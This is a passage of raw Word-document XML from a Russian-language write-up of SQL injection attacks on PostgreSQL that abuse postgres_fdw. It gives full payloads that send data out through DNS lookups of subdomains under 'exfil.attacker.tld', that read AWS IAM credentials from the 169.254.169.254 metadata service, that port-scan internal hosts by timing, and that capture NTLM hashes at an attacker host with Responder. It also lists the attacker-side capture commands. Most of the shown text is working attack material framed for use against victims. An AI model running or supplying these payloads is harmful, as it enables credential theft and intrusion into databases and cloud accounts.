        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    LOOP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            'CREATE SERVER IF NOT EXISTS ev_%s FOREIGN DATA WRAPPER postgres_fdw OPTIONS (host %L)',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            md5(rec.c), rec.c || '.exfil.attacker.tld'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EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            'CREATE USER MAPPING IF NOT EXISTS FOR CURRENT_USER SERVER ev_%s OPTIONS (user ''x'', password ''x'')',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            md5(rec.c)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EXECUTE format(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            'CREATE FOREIGN TABLE IF NOT EXISTS t_%s(c text) SERVER ev_%s OPTIONS (table_name ''t'')',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            md5(rec.c), md5(rec.c)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EXECUTE format('SELECT 1 FROM t_%s', md5(rec.c));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END LOOP;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END $$; --', port '5432', dbname 'main'); END $$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">md5(rec.c)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нужен только чтобы дать уникальное имя SERVER/TABLE для каждого chunk — у этих имён есть ограничение NAMEDATALEN=63 и они не должны содержать недопустимых символов. Атакующий на authoritative-сервере склеивает DNS-labels в порядке прихода, делает hex-decode, разбивает по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получает все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На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Authoritative DNS с query-log (bind):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">options { querylog yes; };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Или коллектор поверх tcpdump:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump -i any -nn -s0 'udp port 53' -w queries.pcap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload C — TCP/SSRF (cloud metadata / port scan / NTLM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Один payload-каркас с тремя вариантами </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host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port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все три эксплуатируют один и тот же механизм (исходящий TCP-коннект от backend postgres), но дают три разные под-цели атаки. Атакующий выбирает вариант под среду жертвы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload (подставляется вместо `req.host`, вариант 1 — cloud metadata `169.254.169.254`):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">169.254.169.254', port '80', dbname 'latest/meta-data/iam/security-credentials/'); CREATE USER MAPPING FOR CURRENT_USER SERVER app_src OPTIONS (user 'x', password 'x'); CREATE FOREIGN TABLE t_meta(c text) SERVER app_src OPTIONS (table_name 'iam'); PERFORM * FROM t_meta; END $$; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты 2 и 3 — меняется только первая строка (host/port):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Вариант 2 — internal port scan (Redis на 6379, ElasticSearch 9200, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.0.5', port '6379', dbname 'x');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Вариант 3 — NTLM capture (только Windows-PG)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker.tld', port '445', dbname 'x'); ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сервер видит (вариант 1, IMDSv1):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DO $$ BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SERVER IF NOT EXISTS app_src</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FOREIGN DATA WRAPPER postgres_fdw</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS (host '169.254.169.254', port '80',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         dbname 'latest/meta-data/iam/security-credentials/');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE USER MAPPING FOR CURRENT_USER SERVER app_src OPTIONS (user 'x', password 'x');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE FOREIGN TABLE t_meta(c text) SERVER app_src OPTIONS (table_name 'iam');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PERFORM * FROM t_meta;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">END $$; --', port '5432', dbname 'main'); END $$;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На стороне атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Вариант 1 — слушать ничего не нужно, ответ IMDS придёт обратно</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#            через postgres_fdw в текст ошибки backend-а.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Вариант 2 — port scan через тайминг ответа:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#   open     → ~100 ms (handshake/RST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#   closed   → ~10 ms  (immediate RST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">#   filtered → ≥30 sec (firewall timeout)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Вариант 3 — Responder на интерфейсе атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo responder -I eth0 -wF</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Три под-цели SSRF, у каждой своя применимость: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Cloud metadata (`169.254.169.254`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — IMDSv1 без header-protection: AWS EC2 до 2024, GCP Compute Engine, Azure при определённых конфигах. Возвращает IAM-credentials (AWS temporary keys), instance metadata, user-data. Применимо: self-hosted PG в IaaS, AWS RDS до миграции на IMDSv2, любые managed-PG в VPC с включённым metadata access.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IMDSv2 (требует PUT-запрос с заголовком </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">X-aws-ec2-metadata-token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делает только GET), Cloud SQL/Supabase (network egress на link-local закрыт).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Internal port scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — backend postgres коннектится на любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">host:port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в private network. Open/filtered/closed различаются по тайминго ответа: open ≈ 100 ms, closed ≈ 10 ms (RST), filtered ≥ 30 сек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или TCP keepalive). Применимо: PG-хост в кластере с доступом к internal services (Redis 6379, Elasticsearch 9200, Kubernetes API 6443, internal HTTP-API).</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NTLM capture (Windows)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — postgres коннектится на attacker SMB-share (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">port 445</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
